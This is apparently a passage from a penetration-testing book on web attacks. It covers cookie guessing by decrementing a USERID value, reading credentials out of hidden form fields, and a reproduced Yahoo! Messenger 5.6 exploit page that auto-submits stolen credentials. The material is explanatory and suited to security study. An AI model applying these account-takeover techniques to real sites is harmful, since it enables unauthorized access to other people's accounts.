Cookie Guessing

Many websites use simple text files called cookies that are downloaded onto a client and used to track the activity of that user or to keep a person logged onto a website when he returns. Cookies often contain ID values that a malicious hacker could modify or guess in order to gain unauthorized access to another account. As an example, consider a fake website that requires users to log on before accessing the site. Figure 7-14 shows the logon page where people are required to register.

Figure 7-14. Creating an Account

After registration, a cookie is downloaded onto the hard drive of the client. Opening the cookie shows the following text:

    USERID
    162294
    www.hackmynetwork.com/
    1536
    691275136
    30063334
    3283149408
    29661002
    *
    AFFILIATION
    0
    www.hackmynetwork.com/
    1536
    2082342272
    29862168
    3283149408
    29661002
    *

Next, change the user ID to a new number. Usually, picking the previous number is sufficient:

    USERID
    162293
    www.hackmynetwork.com/
    1536
    691275136
    30063334
    3283149408
    29661002
    *
    AFFILIATION
    0
    www.hackmynetwork.com/
    1536
    2082342272
    29862168
    3283149408
    29661002
    *

Close the browser and reopen the web page. The website looks at the cookie and logs you in automatically as that user. Figure 7-15 shows a user being automatically logged into a website, with the account information of that user being shown.

Figure 7-15. Cookie Guessing

Hidden Fields

Web pages have the option of using hidden fields to hide information from those viewing a web page. Often, these hidden fields contain vital information such as usernames and passwords. The problem with hidden fields is that they really are not hidden at all; you just have to know where to look for them. Although the web browser might not show the fields, you can look at the source code of the web page to find them. All web browsers provide the capability to view source code, or you can download the website using a utility such as Wget and view the source code offline.
A hidden field is found in forms that are often used when submitting usernames and passwords. Examine the following sample form:

    <FORM name=Authentication_Form action="http://www.hackmynetwork.com/login/login?3fcn8a" method=post>
    Username:<INPUT name=username value="admin" type=hidden>
    Password:<INPUT name=password value="letmein" type=hidden>
    </FORM>

Just by examining this brief form code, you can discover two hidden fields called username and password. By looking at the values of these fields, you can see that the username is admin and the password is letmein. Most developers shy away from using hidden fields. Nevertheless, you should always look at the source code because it might reveal interesting hidden fields.

A great example of using hidden fields to exploit a system is a technique discovered by Rafel Ivgi. He discovered a vulnerability in Yahoo! Messenger 5.6 in which a person could recover the username and password from a temporary file on the user's computer. When a user loads Yahoo! Messenger, a temporary HTML file is stored on his computer that contains his username and password. Example 7-14 shows the sample code to exploit this vulnerability.

Example 7-14. Capturing Yahoo! Passwords

    <html>
    <head>
    <script>
    <!--
    var username;
    username='<username>';
    var password;
    password='<password>';
    function submit () {
      document.getElementById('login').value=username;
      document.getElementById('passwd').value=password;
      document.getElementById('login_form').submit();
    };
    //-->
    </script>
    </head>
    <body onLoad='submit();'>
    <form method=post action="https://login.yahoo.com/config/login" autocomplete=off name=login_form id=login_form onsubmit="return alert(document.forms['login_form'].login.value)">
    <input type="hidden" name=".tries" value="1">
    <input type="hidden" name=".src" value="ym">
    <input type="hidden" name=".md5" value="">
    <input type="hidden" name=".hash" value="">
    <input type="hidden" name=".js" value="">
    <input type="hidden" name=".last" value="2">
    <input type="hidden" name="promo" value="">
    <input type="hidden" name=".intl" value="us">
    <input type="hidden" name=".bypass" value="">
    <input type="hidden" name=".partner" value="">
    <input type="hidden" name=".v" value="0">
    <input type="hidden" name=".yplus" value="">
    <input type="hidden" name=".emailCode" value="">
    <input type="hidden" name="plg" value="">
    <input type="hidden" name="stepid" value="">
    <input type="hidden" name=".ev" value="">
    <input type="hidden" name="hasMsgr" value="0">
    <input type="hidden" name=".chkP" value="Y">
    <input type="hidden" name=".done" value="http://mail.yahoo.com">
    <input type="hidden" name="login" size="17" value="">
    <input type="hidden" name="passwd" size="17" maxlength="32">
    <input type="hidden" name=".save" value="Sign In">
    </form>
    </body>
    </html>

This demonstrates the danger of using hidden fields. Included in the HTML file are both the username and the password. This exploit requires local access to the computer, however, to retrieve the document from the user's TEMP directory.
Note that in Windows 2000 and Windows XP this directory is protected by NTFS permissions, but you can still access the file if you are logged on as that user or as a user who has administrative access, if the computer runs an earlier operating system that does not support NTFS, or if the drive was formatted with FAT instead of NTFS.